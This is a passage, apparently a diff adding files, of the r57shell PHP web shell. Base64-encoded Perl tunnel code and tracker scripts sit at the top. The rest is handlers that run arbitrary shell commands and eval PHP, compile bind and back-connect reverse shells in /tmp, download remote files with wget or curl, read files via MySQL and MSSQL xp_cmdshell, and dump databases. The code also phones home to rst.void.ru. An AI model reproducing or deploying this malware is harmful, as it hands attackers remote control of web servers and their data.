+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#333333 width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#333333><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=122 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MySQL server";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://rst.void.ru\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
